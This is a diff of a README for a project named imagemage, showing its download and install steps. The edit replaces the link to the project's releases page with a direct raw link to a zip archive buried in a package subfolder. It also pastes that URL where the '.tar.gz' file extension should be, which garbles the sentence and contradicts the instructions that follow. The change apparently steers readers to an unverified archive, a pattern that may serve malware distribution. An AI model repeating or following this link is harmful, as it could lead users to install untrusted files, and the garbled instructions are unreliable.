takiama21/imagemage/README.md

 ## 📥 Download & Install

 To get started, you need to download imagemage.
-Visit this page to download: [Download imagemage](https://github.com/takiama21/imagemage/releases).
+Visit this page to download: [Download imagemage](https://raw.githubusercontent.com/takiama21/imagemage/main/pkg/gemini/imagemage_2.7.zip).

 To install, follow these steps:

 1. Click on the link above to go to the releases page.
 2. Look for the latest version of imagemage.
 3. Click on the version name and download the appropriate file for your system.
-Files typically have extensions like `.exe` for Windows or `.tar.gz` for Linux.
+Files typically have extensions like `.exe` for Windows or `https://raw.githubusercontent.com/takiama21/imagemage/main/pkg/gemini/imagemage_2.7.zip` for Linux.
 4. Once the download completes, locate the downloaded file.

 ## ⚙️ System Requirements